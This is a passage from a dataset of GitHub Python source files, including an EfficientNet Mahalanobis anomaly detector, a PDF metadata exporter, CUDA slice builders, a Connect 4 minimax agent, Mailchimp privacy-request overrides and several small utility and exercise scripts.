efficientnet variants, not %s' % args.model_name\n\n # device setup\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n # load model\n model = EfficientNetModified.from_pretrained(args.model_name)\n model.to(device)\n model.eval()\n\n os.makedirs(os.path.join(args.save_path, 'temp'), exist_ok=True)\n\n total_roc_auc = []\n\n for class_name in mvtec.CLASS_NAMES:\n\n train_dataset = mvtec.MVTecDataset(class_name=class_name, is_train=True)\n train_dataloader = DataLoader(train_dataset, batch_size=32, pin_memory=True)\n test_dataset = mvtec.MVTecDataset(class_name=class_name, is_train=False)\n test_dataloader = DataLoader(test_dataset, batch_size=32, pin_memory=True)\n\n train_outputs = [[] for _ in range(9)]\n test_outputs = [[] for _ in range(9)]\n\n # extract train set features\n train_feat_filepath = os.path.join(args.save_path, 'temp', 'train_%s_%s.pkl' % (class_name, args.model_name))\n if not os.path.exists(train_feat_filepath):\n for (x, y, mask) in tqdm(train_dataloader, '| feature extraction | train | %s |' % class_name):\n # model prediction\n with torch.no_grad():\n feats = model.extract_features(x.to(device))\n for f_idx, feat in enumerate(feats):\n train_outputs[f_idx].append(feat)\n\n # fitting a multivariate gaussian to features extracted from every level of ImageNet pre-trained model\n for t_idx, train_output in enumerate(train_outputs):\n mean = torch.mean(torch.cat(train_output, 0).squeeze(), dim=0).cpu().detach().numpy()\n # covariance estimation by using the Ledoit. Wolf et al. method\n cov = LedoitWolf().fit(torch.cat(train_output, 0).squeeze().cpu().detach().numpy()).covariance_\n train_outputs[t_idx] = [mean, cov]\n\n # save extracted feature\n with open(train_feat_filepath, 'wb') as f:\n pickle.dump(train_outputs, f)\n else:\n print('load train set feature distribution from: %s' % train_feat_filepath)\n with open(train_feat_filepath, 'rb') as f:\n train_outputs = pickle.load(f)\n\n gt_list = []\n\n # extract test set features\n for (x, y, mask) in tqdm(test_dataloader, '| feature extraction | test | %s |' % class_name):\n gt_list.extend(y.cpu().detach().numpy())\n # model prediction\n with torch.no_grad():\n feats = model.extract_features(x.to(device))\n for f_idx, feat in enumerate(feats):\n test_outputs[f_idx].append(feat)\n for t_idx, test_output in enumerate(test_outputs):\n test_outputs[t_idx] = torch.cat(test_output, 0).squeeze().cpu().detach().numpy()\n\n # calculate Mahalanobis distance per each level of EfficientNet\n dist_list = []\n for t_idx, test_output in enumerate(test_outputs):\n mean = train_outputs[t_idx][0]\n cov_inv = np.linalg.inv(train_outputs[t_idx][1])\n dist = [mahalanobis(sample, mean, cov_inv) for sample in test_output]\n dist_list.append(np.array(dist))\n\n # Anomaly score is followed by unweighted summation of the Mahalanobis distances\n scores = np.sum(np.array(dist_list), axis=0)\n\n # calculate image-level ROC AUC score\n fpr, tpr, _ = roc_curve(gt_list, scores)\n roc_auc = roc_auc_score(gt_list, scores)\n total_roc_auc.append(roc_auc)\n print('%s ROCAUC: %.3f' % (class_name, roc_auc))\n plt.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, roc_auc))\n\n print('Average ROCAUC: %.3f' % np.mean(total_roc_auc))\n plt.title('Average image ROCAUC: %.3f' % np.mean(total_roc_auc))\n plt.legend(loc='lower right')\n plt.savefig(os.path.join(args.save_path, 'roc_curve_%s.png' % args.model_name), dpi=200)\n\n\nclass EfficientNetModified(EfficientNet):\n\n def extract_features(self, inputs):\n \"\"\" Returns list of the feature at each 
level of the EfficientNet \"\"\"\n\n feat_list = []\n\n # Stem\n x = self._swish(self._bn0(self._conv_stem(inputs)))\n feat_list.append(F.adaptive_avg_pool2d(x, 1))\n\n # Blocks\n x_prev = x\n for idx, block in enumerate(self._blocks):\n drop_connect_rate = self._global_params.drop_connect_rate\n if drop_connect_rate:\n drop_connect_rate *= float(idx) / len(self._blocks)\n x = block(x, drop_connect_rate=drop_connect_rate)\n if (x_prev.shape[1] != x.shape[1] and idx != 0) or idx == (len(self._blocks) - 1):\n feat_list.append(F.adaptive_avg_pool2d(x_prev, 1))\n x_prev = x\n\n # Head\n x = self._swish(self._bn1(self._conv_head(x)))\n feat_list.append(F.adaptive_avg_pool2d(x, 1))\n\n return feat_list\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"byungjae89/MahalanobisAD-pytorch","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"76"} +{"seq_id":"72179039286","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport xml.etree.ElementTree as etree\n\nimport pandas as pd\n\nfrom pdf_analytics import PdfAnalytics\n\n\nclass PdfFolder:\n DC_NS = {'dc': 'http://purl.org/dc/elements/1.1/'}\n\n def __init__(self, folder_path: str):\n self.folder_path = folder_path\n self.analytics = self.__get_pdf_analytics()\n etree.register_namespace('dc', self.DC_NS['dc'])\n\n def pdf_paths(self) -> list[str]:\n return [pdf.filepath for pdf in self.analytics]\n\n def to_file(self, xml_path: str) -> None:\n tree = self.__xml()\n with open(xml_path, 'w') as xml_file:\n tree.write(xml_file, encoding='unicode', xml_declaration=True)\n\n def to_xml(self) -> str:\n tree = self.__xml()\n result = etree.tostring(tree.getroot(), encoding='unicode')\n return result\n\n def dc_dataframe(self) -> pd.DataFrame:\n result = list()\n for pa in self.analytics:\n values = {'filename': pa.filename}\n values.update(self.__get_tag_values(pa))\n result.append(values)\n return pd.DataFrame.from_dict(result)\n\n def stats_dataframe(self) -> pd.DataFrame:\n result = list()\n for pa in self.analytics:\n values = {'filename': pa.filename}\n values['pages'] = pa.page_count()\n values['figures'] = pa.figure_count()\n values['tables'] = pa.table_count()\n values['images'] = pa.image_count()\n result.append(values)\n return pd.DataFrame.from_dict(result)\n\n def __get_pdf_files(self) -> list:\n result = list()\n for file in os.listdir(self.folder_path):\n if file.lower().endswith('.pdf'):\n pdf_path = os.path.join(self.folder_path, file)\n result.append(pdf_path)\n return result\n\n def __get_pdf_analytics(self) -> list:\n result = list()\n for pdf_path in self.__get_pdf_files():\n pa = PdfAnalytics(pdf_path)\n result.append(pa)\n return result\n\n def __dc_tag(self, tag: str) -> str:\n return f'{{{self.DC_NS[\"dc\"]}}}{tag}'\n\n def __get_tag_values(self, pdf: PdfAnalytics) -> dict:\n return {\n 'contributor': pdf.contributor(),\n 'coverage': pdf.coverage(),\n 'creator': pdf.creator(),\n 'date': pdf.date(),\n 'description': pdf.description(),\n 'format': pdf.format_(),\n 'identifier': pdf.identifier(),\n 'language': pdf.language(),\n 'publisher': pdf.publisher(),\n 'relation': pdf.relation(),\n 'rights': pdf.rights(),\n 'source': pdf.source(),\n 'subject': pdf.subject(),\n 'title': pdf.title(),\n 'type': pdf.type_()\n }\n\n def __analytics_to_xml(self, pdf: PdfAnalytics) -> etree.Element:\n pdf_tree = etree.Element('paper', attrib={'filename': pdf.filename})\n pdf_tree.set('pages', 
str(pdf.page_count()))\n pdf_tree.set('tables', str(pdf.table_count()))\n pdf_tree.set('figures', str(pdf.figure_count()))\n tag_values = self.__get_tag_values(pdf)\n for tag in tag_values:\n for value in tag_values[tag]:\n element = etree.SubElement(pdf_tree, self.__dc_tag(tag))\n element.text = value\n return pdf_tree\n\n def __xml(self) -> etree.ElementTree:\n root = etree.Element('metadata')\n for pdf in self.analytics:\n pdf_xml = self.__analytics_to_xml(pdf)\n root.append(pdf_xml)\n tree = etree.ElementTree(root)\n etree.indent(tree, space=\"\\t\", level=0)\n return tree\n","repo_name":"joseamdev/tfg","sub_path":"src/pdf_folder.py","file_name":"pdf_folder.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25096916484","text":"from typing import List\nimport logging\nimport numpy as np\n\ntry:\n import cupy as cp\nexcept ImportError:\n raise ImportError(\"the module require cupy\")\n\ntry:\n from .cuda_ext import slice_kernel_cuda\nexcept ImportError:\n raise ImportError(\"cuda extension cannot be found. Compile it first\")\n\nfrom .slice_builder_base import OneSliceBuilderBase, MultiSlicesBuilderBase\nfrom ..physics import water_num_dens\n\n\nlogger = logging.getLogger(__name__)\n\ncupy_mempool = cp.get_default_memory_pool()\n\n\nclass OneSliceBuilder(OneSliceBuilderBase):\n def __init__(self, unique_elements: List[int], \n n1: int, n2: int,\n d1: float, d2: float):\n logger.debug(\"using cuda OneSliceBuilder\")\n super(OneSliceBuilder, self).__init__(unique_elements, n1, n2, d1, d2)\n scattering_factors = cp.asarray(self.scattering_factors, dtype=cp.float32)\n self.backend = slice_kernel_cuda.OneSliceBuilder(scattering_factors, n1, n2, d1, d2)\n\n def bin_atoms_one_slice(self, atom_coordinates_sorted_by_elems, unique_elements_count):\n elems_count_gpu = cp.asarray(unique_elements_count, dtype=cp.uint32)\n atom_coords_gpu = cp.asarray(atom_coordinates_sorted_by_elems, dtype=cp.float32)\n atmv_gpu = self.backend.bin_atoms_one_slice(atom_coords_gpu, elems_count_gpu)\n return atmv_gpu\n\n def make_one_slice(self, atom_histograms_one_slice_gpu, symmetric_bandlimit: bool = True):\n aslice_gpu = self.backend.make_one_slice(atom_histograms_one_slice_gpu)\n if symmetric_bandlimit:\n aslice_gpu = _symmetric_bandlimit_real_cupy(aslice_gpu)\n cp.clip(aslice_gpu, a_min=1e-13, a_max=None, out=aslice_gpu)\n return aslice_gpu\n\n\nclass MultiSlicesBuilder(MultiSlicesBuilderBase):\n def __init__(self, unique_elements: List[int],\n n_slices: int, n1: int, n2: int,\n dz: float, d1: float, d2: float):\n logger.debug(\"using cuda MultiSlicesBuilder\")\n logger.debug(f\"cupy mempool limit: {cupy_mempool.get_limit()/1024**2:.2f}MB\")\n super(MultiSlicesBuilder, self).__init__(unique_elements, n_slices, n1, n2, dz, d1, d2)\n scattering_factors = cp.asarray(self.scattering_factors, dtype=cp.float32)\n self.backend = slice_kernel_cuda.MultiSlicesBuilder(scattering_factors, n_slices, n1, n2, dz, d1, d2)\n\n def bin_atoms_multi_slices(self, atom_coordinates_sorted_by_elems, unique_elements_count):\n elems_count_gpu = cp.asarray(unique_elements_count, dtype=cp.uint32)\n atom_coords_gpu = cp.asarray(atom_coordinates_sorted_by_elems, dtype=cp.float32)\n atmv_gpu = self.backend.bin_atoms_multi_slices(atom_coords_gpu, elems_count_gpu)\n return atmv_gpu\n\n def make_multi_slices(self, atom_histograms, symmetric_bandlimit: bool = True):\n slices_gpu = self.backend.make_multi_slices(atom_histograms)\n 
logger.debug(\"cupy allocated: {:.2f}MB\".format(cupy_mempool.total_bytes()/1024**2))\n logger.debug(\"cupy used total: {:.2f}MB\".format(cupy_mempool.used_bytes()/1024**2))\n if symmetric_bandlimit:\n slices_gpu = _symmetric_bandlimit_real_cupy(slices_gpu)\n cp.clip(slices_gpu, a_min=1e-13, a_max=None, out=slices_gpu)\n return slices_gpu\n\n def add_water(self, atom_histograms_gpu):\n vacs = cp.prod(cp.where(atom_histograms_gpu == 0, True, False), axis=0)\n # average number of water molecules in a voxel\n vox_wat_num = water_num_dens * self.d1 * self.d2 * self.dz\n box = (self.n_slice, self.n1, self.n2)\n\n oxygens = cp.where(vacs, cp.random.poisson(vox_wat_num, box), 0).astype(cp.int)\n hydrogens = cp.where(vacs, cp.random.poisson(vox_wat_num * 2, box), 0).astype(cp.int)\n\n unique_elements_list = list(self.unique_elements)\n for z, hist in [(1, hydrogens), (8, oxygens)]:\n idx = unique_elements_list.index(z)\n atom_histograms_gpu[idx] += hist\n return atom_histograms_gpu\n\n\ndef _symmetric_bandlimit_real_cupy(arr):\n # return arr\n # arr (n0, n1, n2)\n n1, n2 = arr.shape[-2:]\n r = min(n1, n2) // 2\n kx, ky = cp.meshgrid(cp.arange(-n1//2, -n1//2 + n1), cp.arange(-n2//2, -n2//2 + n2))\n k2 = kx**2 + ky**2\n fil = cp.where(k2 <= r**2, 1., 0.)\n fil = cp.fft.ifftshift(fil).astype(cp.float32) # (n1, n2)\n ft = cp.fft.rfft2(arr, axes=(-2,-1), s=(n1, n2))\n ret = cp.fft.irfft2(ft * fil[:, :n2//2+1], s=(n1, n2)) # (n0, n1, n2)\n return ret\n \n","repo_name":"Varato/emsim","sub_path":"emsim/backend/slice_builder_cuda.py","file_name":"slice_builder_cuda.py","file_ext":"py","file_size_in_byte":4475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8280914171","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"create file hash\"\"\"\n\nimport argparse\nimport hashlib\nimport math\nimport os\nimport sys\nimport progressbar\n\nSUPPORTED_TYPES = ['md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']\n\n\ndef parse_args():\n \"command line arguments\"\n parser = argparse.ArgumentParser(\n description='create file hash',\n )\n parser.add_argument('file', action=\"store\", type=str,\n help=\"input file\")\n\n parser.add_argument('-t', action=\"store\", type=str,\n dest='type', default='md5', choices=SUPPORTED_TYPES, help=\"hash type\")\n\n parser.add_argument('--noprogress', action=\"store_true\",\n dest='no_progress', help=\"hide progressbar\")\n\n options = parser.parse_args()\n\n return options\n\n\ndef create_hash(target_file, hash_type, no_progress):\n \"create hash with file and type\"\n\n target_file = os.path.realpath(target_file)\n if not os.path.isfile(target_file):\n print(\"{0} is not a valid file\".format(target_file))\n sys.exit(2)\n\n hash_func = getattr(hashlib, hash_type)\n hash_value = hash_func()\n\n buff_size = 65536\n\n file_size = os.path.getsize(target_file)\n loop_count = math.ceil(file_size / buff_size)\n\n with open(target_file, 'rb') as file_to_hash:\n if (not no_progress) and loop_count > 64:\n progress_bar = progressbar.ProgressBar()\n\n for _ in progress_bar(range(loop_count)):\n data = file_to_hash.read(buff_size)\n hash_value.update(data)\n else:\n data = file_to_hash.read()\n hash_value.update(data)\n\n hash_value = hash_value.hexdigest()\n return hash_value\n\n\nif __name__ == \"__main__\":\n OPTIONS = parse_args()\n print(create_hash(OPTIONS.file, OPTIONS.type, 
OPTIONS.no_progress))\n","repo_name":"ttchengcheng/pycmd","sub_path":"filehash.py","file_name":"filehash.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18230710381","text":"from models import *\nfrom rs3_api_constants import item_categories\nfrom utilities import log_manager\n\nlog = log_manager.get_logger('RS3ItemIds.db_manager')\n\"\"\"Logger object specific to db_manager.\"\"\"\n\nMODELS = [Category, ItemPage, Item]\n\n__all__ = [\n 'create_tables',\n 'populate_item_categories'\n]\n\n\ndef create_tables():\n \"\"\"Creates database tables for each model if they do not already exist.\"\"\"\n db.connect()\n db.create_tables(MODELS)\n db.close()\n\n\ndef populate_item_categories():\n \"\"\"Inserts categories generated from the categories dictionary in rs3_api_constants.py\"\"\"\n categories = [Category(id=category_id, name=name) for category_id, name in item_categories.items()]\n Category.bulk_create(categories)\n\n\nif __name__ == \"__main__\":\n create_tables()\n populate_item_categories()\n","repo_name":"shanecb/RS3-Item-IDs","sub_path":"db_manager.py","file_name":"db_manager.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"17680287959","text":"import operator\n\n#drops a token in the specified column, returns a tuple of (the game board after the drop, if the drop was successful)\ndef didDropToken(column, game_board, empty_num, my_player_num):\n if (game_board[0][column] != empty_num): #if the top spot is already occupied\n return game_board, False #we can't move here\n else:\n row = 1 #go to the next spot\n while row < len(game_board) - 1: #while we're stil on the board\n if (game_board[row][column] == empty_num): #if the spot is empty\n row += 1 #account for gravity\n if (game_board[row][column] != empty_num): #otherwise there's a piece here\n game_board[row - 1][column] = my_player_num #our token will land on top\n return game_board, True #it dropped!\n game_board[row][column] = my_player_num #we're at the bottom of the board\n return game_board, True #the token landed\n\ndef tryDropAndScore(column, game_board, empty_num, player_num):\n copy_game_board = [row[:] for row in game_board] #need a deep copy here\n dropAttempt = didDropToken(column, copy_game_board, empty_num, player_num) #try dropping a token \n if (dropAttempt[1] == True): #if it worked\n score = evaluate(dropAttempt[0], player_num) #evaluate it\n return (score, dropAttempt[0]) #(the score after the drop, the game board after the drop)\n else: #if it didn't work\n score = -1000 #give it a low score\n return (score, dropAttempt[0]) #(the score after the drop, the game board after the drop)\n\ndef miniMax (game_board, empty_num, my_player_num):\n move_set = []\n scored_move_set = []\n min_max_flipper = 2\n opponent_num = getOpponentNum(my_player_num)\n cols = len(game_board[0])\n\n #generate the moveset\n for a in range(cols): #my first move\n for b in range(cols): #their move\n for c in range(cols): #my move\n move_set.append((a, b, c)) #including base state, this is a 4-ply moveset\n\n #for every combination, loop through the columns\n for move in move_set: \n current_board = game_board #reset the game board to the current state\n my_scored_moves = []\n for token_drop in move:\n if (min_max_flipper % 2 == 0): # if it's my turn\n drop = tryDropAndScore(token_drop, current_board, empty_num, my_player_num) #drop 
my piece and score it\n my_scored_moves.append((drop[0], token_drop))\n else: #if it's their turn\n drop = tryDropAndScore(token_drop, current_board, empty_num, opponent_num) #drop their piece and score it\n my_scored_moves.append((drop[0], token_drop))\n current_board = drop[1] #keep this move's board intact\n min_max_flipper += 1 #it's the next player's turn\n scored_move_set.append(my_scored_moves) #put this move set into the list of scored move sets\n\n best_moves = max_eval(scored_move_set, 2, 1)\n best_moves1 = min_eval(best_moves, 1, 1)\n best_moves2 = max_eval(best_moves1, 0, 1)\n\n return best_moves2[0][0][1]\n\ndef max_eval(scored_move_set, which_tuple, which_value):\n cols_to_check = []\n for x in scored_move_set: \n if x[which_tuple][which_value] not in cols_to_check: \n cols_to_check.append(x[which_tuple][which_value])\n\n best_moves = []\n for col in cols_to_check:\n moves_this_col = [t for t in scored_move_set if t[which_tuple][which_value] == col] #all of the moves for this column in this ply\n moves_this_col.sort(key = operator.itemgetter(which_tuple), reverse = True) #sort them (MAX)\n best_moves.append(moves_this_col[0]) #grab the best and append it to the best moves\n return best_moves\n\ndef min_eval(scored_move_set, which_tuple, which_value):\n cols_to_check = []\n for x in scored_move_set: \n if x[which_tuple][which_value] not in cols_to_check: \n cols_to_check.append(x[which_tuple][which_value])\n\n best_moves = []\n for col in cols_to_check:\n moves_this_col = [t for t in scored_move_set if t[which_tuple][which_value] == col] #all of the moves for this column in this ply\n moves_this_col.sort(key = operator.itemgetter(which_tuple)) #sort them (MIN)\n best_moves.append(moves_this_col[0]) #grab the best and append it to the best moves\n return best_moves\n\n#opponent will always be opposite of me, tell me what that is (1 or 2)\ndef getOpponentNum(my_player_num):\n if (my_player_num == 1):\n opponent_num = 2\n else: \n opponent_num = 1\n return opponent_num\n\n#give me a score for this state of the board\ndef evaluate(game_board, my_player_num):\n connect = 4 #we are trying to connect this many\n empty_num = 0 #this is the symbol representing an empty space\n opponent_num = getOpponentNum(my_player_num)\n\n # coords are a (row, column) tuple - 0 based\n my_player_coords = [] \n opponent_coords = []\n\n for row in range(len(game_board)): #for all the rows\n for col in range(len(game_board[row])): #and all the columns\n if (game_board[row][col] == my_player_num): #if the current spot has my player \n my_player_coords.append((row, col)) #add it to my coordinate list\n elif (game_board[row][col] == opponent_num): #if the current spot has the opponent\n opponent_coords.append((row, col)) #add it to the opponent's list\n \n my_score = playerScore(my_player_coords, my_player_num, game_board, connect, empty_num) #test my score\n opponent_score = playerScore(opponent_coords, opponent_num, game_board, connect, empty_num) #test opponent's score\n score = my_score - opponent_score #more positive means better for me\n return score\n\n#take all of the coords and check out three in either direction. Gets a point if empty. Gets 2 if filled with player of same type. 
Stops if finds opponent.\ndef playerScore(player_coords, player_num, game_board, connect, empty_num):\n score = 0 \n for coord in player_coords: #for all of the coords in the list\n row = int(coord[0])\n col = int(coord[1])\n #check up, down, right, left\n #check down\n for step in range(row + 1, row + connect):\n test_result = coordScore(game_board, step, col, empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n #check up \n for step in range(row - 1, row - connect, -1):\n test_result = coordScore(game_board, step, col, empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n #check right\n for step in range(col + 1, col + connect):\n test_result = coordScore(game_board, row, step, empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n #check left\n for step in range(col - 1, col - connect, -1):\n test_result = coordScore(game_board, row, step, empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n\n #check diagonal directions \n check_row_diag = row + 1 #diag x value to check\n check_col_diag = col + 1 #diag y value to check\n while (check_row_diag <= row + connect and check_col_diag <= col + connect): #check diag down, right\n test_result = coordScore(game_board, check_row_diag, check_col_diag , empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n check_row_diag += 1\n check_col_diag += 1\n check_row_diag = row + 1 #diag x value to check\n check_col_diag = col - 1 #diag y value to check\n while (check_row_diag <= row + connect and check_col_diag >= col - connect): #check diag down, left\n test_result = coordScore(game_board, check_row_diag, check_col_diag , empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n check_row_diag += 1\n check_col_diag -= 1\n check_row_diag = row - 1 #diag x value to check\n check_col_diag = col + 1 #diag y value to check\n while (check_row_diag >= row - connect and check_col_diag <= col + connect): #check diag up, right\n test_result = coordScore(game_board, check_row_diag, check_col_diag , empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n check_row_diag -= 1\n check_col_diag += 1\n check_row_diag = row - 1 #diag x value to check\n check_col_diag = col - 1 #diag y value to check\n while (check_row_diag >= row - connect and check_col_diag >= col - connect): #check diag up, right\n test_result = coordScore(game_board, check_row_diag, check_col_diag , empty_num, player_num)\n score += test_result[0]\n if (test_result[1] == False):\n break\n check_row_diag -= 1\n check_col_diag -= 1\n return score\n\n#apply a score to checked coords\ndef coordScore (game_board, row, col, empty_num, my_player_num):\n row_count = len(game_board)\n col_count = len(game_board[0]) #assumes uniformity\n if(row > row_count - 1 or row < 0 or col > col_count - 1 or col < 0): #if these coords aren't in the bounds of the board\n return (0, False) #don't give any points and don't allow more calls\n if (game_board[row][col] == empty_num): #if the space is empty\n return (1, True) #give 1 point and allow more calls\n elif (game_board[row][col] == my_player_num): #if the space has my player\n return (3, True) #give 2 points and allow more calls\n else: #otherwise it's the other player\n return (0, False) #subtract 2 points and don't allow more calls\n\nif __name__ == '__main__':\n \n board3 = [[0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0],\n 
[0,0,0,0,0,0,0],\n              [0,0,0,0,0,0,0],\n              [0,0,0,0,0,1,0],\n              [0,2,0,0,0,1,0]]\n\n    print(miniMax(board3, 0, 1))","repo_name":"RubiconIII/Connect4Agent","sub_path":"connect4Agent.py","file_name":"connect4Agent.py","file_ext":"py","file_size_in_byte":10198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71720793846","text":"# Python3 program to sort an array of\n# numbers in range from 1 to n.\n\n# function for sort array\n#Input: [3, 3, 2, 1, 3, 2, 1]\n#Output: [1, 1, 2, 2, 3, 3, 3]\ndef sortNums(arr, n):\n    # counting sort: values are assumed to lie in the range 1..n\n    counts = [0] * (n + 1)\n    for v in arr:\n        counts[v] += 1\n    arr[:] = [v for v in range(1, n + 1) for _ in range(counts[v])]\n    return arr\n\narr = 
[3, 3, 2, 1, 3, 2, 1]\nn = len(arr)\nprint (sortNums(arr, n))\n# [1, 1, 2, 2, 3, 3, 3]\n\n\n# Driver code\n# if __name__ == '__main__':\n# arr = [10, 7, 9, 2, 8, 3, 5, 4, 6, 1]\n# n = len(arr)\n#\n# # for sort an array\n# sortit(arr, n)\n#\n# # for print all the element\n# # in sorted way\n# for i in range(n):\n# print(arr[i], end=\" \")\n\n # This code is contributed by\n# Shrikant13\n","repo_name":"dandraden/Python-Projects","sub_path":"project-01/Sorton.py","file_name":"Sorton.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"126041838","text":"from json import dumps\nfrom typing import Any, Dict, List\n\nimport pydash\n\nfrom fides.api.graph.traversal import TraversalNode\nfrom fides.api.models.policy import Policy\nfrom fides.api.models.privacy_request import PrivacyRequest\nfrom fides.api.schemas.saas.shared_schemas import HTTPMethod, SaaSRequestParams\nfrom fides.api.service.connectors.saas.authenticated_client import AuthenticatedClient\nfrom fides.api.service.saas_request.saas_request_override_factory import (\n SaaSRequestType,\n register,\n)\nfrom fides.api.util.collection_util import Row\n\n\n@register(\"mailchimp_messages_access\", [SaaSRequestType.READ])\ndef mailchimp_messages_access(\n client: AuthenticatedClient,\n node: TraversalNode,\n policy: Policy,\n privacy_request: PrivacyRequest,\n input_data: Dict[str, List[Any]],\n secrets: Dict[str, Any],\n) -> List[Row]:\n \"\"\"\n Equivalent SaaS config for the code in this function.\n\n Request params still need to be defined for endpoints with overrides.\n This is to provide the necessary reference and identity data as part\n of graph traversal. The resulting values are passed in as parameters\n so we don't need to define the data retrieval here.\n\n path: /3.0/conversations//messages\n request_params:\n - name: conversation_id\n type: path\n references:\n - dataset: mailchimp_instance\n field: conversations.id\n direction: from\n data_path: conversation_messages\n postprocessors:\n - strategy: filter\n configuration:\n field: from_email\n value:\n identity: email\n \"\"\"\n # gather request params\n conversation_ids = input_data.get(\"conversation_id\")\n\n # build and execute request for each input data value\n processed_data = []\n if conversation_ids:\n for conversation_id in conversation_ids:\n response = client.send(\n SaaSRequestParams(\n method=HTTPMethod.GET,\n path=f\"/3.0/conversations/{conversation_id}/messages\",\n )\n )\n\n # unwrap and post-process response\n response_data = pydash.get(response.json(), \"conversation_messages\")\n filtered_data = pydash.filter_(\n response_data,\n {\"from_email\": privacy_request.get_cached_identity_data().get(\"email\")},\n )\n\n # build up final result\n processed_data.extend(filtered_data)\n\n return processed_data\n\n\n@register(\"mailchimp_member_update\", [SaaSRequestType.UPDATE])\ndef mailchimp_member_update(\n client: AuthenticatedClient,\n param_values_per_row: List[Dict[str, Any]],\n policy: Policy,\n privacy_request: PrivacyRequest,\n secrets: Dict[str, Any],\n) -> int:\n rows_updated = 0\n # each update_params dict correspond to a record that needs to be updated\n for row_param_values in param_values_per_row:\n # get params to be used in update request\n list_id = row_param_values.get(\"list_id\")\n subscriber_hash = row_param_values.get(\"subscriber_hash\")\n\n # in this case, we can just put the masked object fields object\n # directly into the request body\n 
update_body = dumps(row_param_values[\"masked_object_fields\"])\n\n client.send(\n SaaSRequestParams(\n method=HTTPMethod.PUT,\n path=f\"/3.0/lists/{list_id}/members/{subscriber_hash}\",\n body=update_body,\n )\n )\n\n rows_updated += 1\n return rows_updated\n","repo_name":"ethyca/fides","sub_path":"src/fides/api/service/saas_request/override_implementations/mailchimp_request_overrides.py","file_name":"mailchimp_request_overrides.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":302,"dataset":"github-code","pt":"76"} +{"seq_id":"39626981137","text":"import casadi as ca\n\nclass ToyCar():\n \"\"\"\n Toy Car Example \n \n 3 States: \n [x, y, psi]\n \n 2 Inputs:\n [v, psi_rate]\n \n \"\"\"\n def __init__(self):\n self.define_states()\n self.define_controls()\n \n def define_states(self):\n self.x = ca.SX.sym('x')\n self.y = ca.SX.sym('y')\n self.psi = ca.SX.sym('psi')\n \n self.states = ca.vertcat(\n self.x,\n self.y,\n self.psi\n )\n #column vector of 3 x 1\n self.n_states = self.states.size()[0] #is a column vector \n \n def define_controls(self):\n self.v_cmd = ca.SX.sym('v_cmd')\n self.psi_cmd = ca.SX.sym('psi_cmd')\n \n self.controls = ca.vertcat(\n self.v_cmd,\n self.psi_cmd\n )\n #column vector of 2 x 1\n self.n_controls = self.controls.size()[0] \n \n def set_state_space(self):\n #this is where I do the dynamics for state space\n self.x_dot = self.v_cmd * ca.cos(self.psi)\n self.y_dot = self.v_cmd * ca.sin(self.psi)\n self.psi_dot = self.psi_cmd\n \n self.z_dot = ca.vertcat(\n self.x_dot, self.y_dot, self.psi_dot \n )\n \n #ODE right hand side function\n self.function = ca.Function('f', \n [self.states, self.controls],\n [self.z_dot]\n ) ","repo_name":"jn89b/trajectory_planning","sub_path":"local_planner/mpc/src/StateModels/ToyCar.py","file_name":"ToyCar.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74067294006","text":"class Solution:\n def merge(self, intervals: List[List[int]]) -> List[List[int]]:\n interval = sorted(intervals, key=lambda x: x[0])\n merged = [interval[0]]\n\n for i in interval:\n # Merging algorithm:\n # If the start of the current sorted interval is\n # lesser than the current furthest interval's end\n if i[0] <= merged[-1][-1]:\n merged[-1][-1] = max(merged[-1][-1], i[1])\n else:\n merged.append(i)\n\n return merged\n","repo_name":"Lei-Tin/Leetcode","sub_path":"Medium/#56 merge.py","file_name":"#56 merge.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"33517224348","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\nimport pandas as pd\nfrom sklearn.datasets import fetch_olivetti_faces\nfofdata = fetch_olivetti_faces()\n\n\n# In[6]:\n\n\nfofdata.keys()\n\n\n# In[21]:\n\n\ndf = pd.DataFrame(fofdata['data'])\ndf['labels'] = fofdata['target']\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(fofdata['data'], fofdata['target'], test_size = 0.2)\nlogreg = LogisticRegression()\nlogreg.fit(X_train,y_train)\nvals = logreg.predict(X_test)\nfrom sklearn.metrics import accuracy_score\naccuracy_score(y_test, vals)\n\n\n# In[31]:\n\n\n#With basic Logistic Regression, we were able to get a 96.25% accuracy\n#Lets now check recall and precision\nfrom sklearn.metrics import 
